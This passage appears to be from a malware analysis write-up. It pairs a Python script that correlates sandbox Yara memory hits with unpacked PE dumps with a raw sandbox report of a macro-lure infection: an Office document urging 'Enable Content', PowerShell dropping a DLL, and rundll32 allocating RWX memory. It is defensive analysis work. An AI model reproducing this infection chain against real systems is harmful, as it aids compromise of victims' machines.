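Source: Yara match File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
"""

# Documented Windows memory protection and region type constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
REGION_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: process.state.dumpid.base.protection.regiontype.sdmp
MEM_RE = re.compile(
    r"^Source: Yara match File source: (?P<pid>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})"
    r"\.(?P<dumpid>\d+)\.(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})"
    r"\.(?P<rtype>[0-9A-Fa-f]{8})\.sdmp, type: MEMORY$")
# process.state.image.base.index[.raw].unpack
PE_RE = re.compile(
    r"^Source: Yara match File source: (?P<name>(?P<pid>\d+)\.(?P<state>\d+)\.(?P<image>.+?)"
    r"\.(?P<base>[0-9A-Fa-f]+)\.(?P<idx>\d+)\.(?:raw\.)?unpack), type: UNPACKEDPE$")


def decode_protect(value):
    """Name the base protection; PAGE_GUARD/PAGE_NOCACHE are modifier bits."""
    return PAGE_PROTECT.get(value & 0xFF, f"0x{value:x}")


def parse(text):
    """Return (memory hits, {(pid, base): [unpacked PE names]})."""
    mem, pes = [], defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        m = MEM_RE.match(line)
        if m:
            rtype = int(m["rtype"], 16)
            mem.append({
                "pid": int(m["pid"], 16), "state": int(m["state"], 16),
                "base": int(m["base"], 16),
                "protect": decode_protect(int(m["prot"], 16)),
                "region": REGION_TYPE.get(rtype, f"0x{rtype:x}"),
            })
            continue
        p = PE_RE.match(line)
        if p:
            pes[(int(p["pid"]), int(p["base"], 16))].append(p["name"])
    return mem, pes


def correlate(text):
    """Each memory hit plus the unpacked PEs rebuilt from the same region."""
    mem, pes = parse(text)
    return [{**r, "unpacked": sorted(pes.get((r["pid"], r["base"]), []))} for r in mem]


def all_rwx(text):
    """True when every Yara memory hit sits in PAGE_EXECUTE_READWRITE memory."""
    return all(r["protect"] == "PAGE_EXECUTE_READWRITE" for r in correlate(text))


def unmatched_regions(text):
    """(pid, base) of memory hits with no rebuilt PE: look at these by hand."""
    return [(r["pid"], r["base"]) for r in correlate(text) if not r["unpacked"]]


if __name__ == "__main__":
    for r in correlate(SAMPLE_LINES):
        print(f"pid {r['pid']:>2} base 0x{r['base']:06x} {r['protect']:<22} "
              f"{r['region']:<11} unpacked: {', '.join(r['unpacked']) or '-'}")
    print("all hits in RWX memory:", all_rwx(SAMPLE_LINES))
    print("regions without a rebuilt PE:", unmatched_regions(SAMPLE_LINES))
```

On the subset above the join shows process 7 region 0x430000 with both the raw and the rebuilt dump available, process 7 region 0x170000 with a Yara hit but no PE, and every hit in PAGE_EXECUTE_READWRITE memory; running it over the full list of the report gives the same picture for all eighteen rundll32.exe instances.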

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G)
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G) ,, . ZE iss ,,gS
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8 Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
Very long command line found
Source: unknown Process created: Commandline size = 5669
Source: unknown Process created: Commandline size = 5568
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5568
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Eahqlsuythns\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00436417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00434844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00445250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00440672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00442C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00431806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00432208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00435418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00440223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00448C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00444C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00442631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00448A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00441090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00444A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00443F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00449B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00437378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00435B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00444F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00439106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00435F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00439D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00437731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00437B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004357D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00432DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00446BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004367EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00441DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00437FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004335FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00447187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00441F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00440B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00434D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00443590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0044C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00442FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004493AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004447B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00447BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00449DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004409B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00184012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00180604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00179C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00179846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00184478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00175478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00189665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00179A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001890BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001834BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00176CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001792A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001770AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00172EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001728AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00189EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001808CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001838C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001834C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001866FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001814FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001800FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001750F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001768EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001730E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00182515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00174304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00187132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00189333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00173523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00186158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00172353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00174D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00182179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00172B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00181372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00170D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00175D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00179D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00171983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00173DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001841AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00181BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00187FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001727F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00471E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00404844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00415250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00406417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00405F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00410B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00404D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004147B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00410672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00412C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00401806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00402208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00405418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00410223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00418C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00412631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00418A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00414C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00411090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00414A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00419B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00413F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00407378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00405B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00414F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00409106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00409D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00407731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00407B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004057D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00402DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00416BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004067EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004035FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00407FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00411DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00417187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00411F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00413590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0041C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00412FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004193AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_004109B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0040FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00419DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00417BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FC017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00200604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00204012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00209665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00204478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FE272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002090BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002034BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F70AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002066FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002014FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002000FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002038C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002034C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002008CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F30E8
